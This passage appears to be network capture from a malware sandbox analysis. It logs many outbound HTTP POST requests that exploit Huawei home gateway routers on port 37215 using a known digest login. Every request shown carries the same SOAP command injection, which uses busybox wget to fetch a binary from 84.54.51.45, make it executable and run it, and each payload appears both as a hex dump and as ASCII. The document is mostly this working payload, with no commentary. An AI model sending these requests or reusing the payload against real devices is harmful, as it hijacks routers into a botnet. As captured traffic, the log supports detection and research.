2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            170192.168.2.1539242197.126.238.5937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176892042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            171192.168.2.1542656197.39.65.5937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176930904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            172192.168.2.1541554197.245.183.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176955938 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            173192.168.2.1560266197.152.22.17537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176989079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            174192.168.2.1550626197.59.102.14037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177002907 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            175192.168.2.1552618197.2.169.18137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177037954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            176192.168.2.1554768197.148.215.11237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177040100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            177192.168.2.1550094197.30.84.5337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177061081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            178192.168.2.1545036197.70.188.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177097082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            179192.168.2.1541352197.40.54.23737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177107096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            180192.168.2.1558920197.169.127.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177128077 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
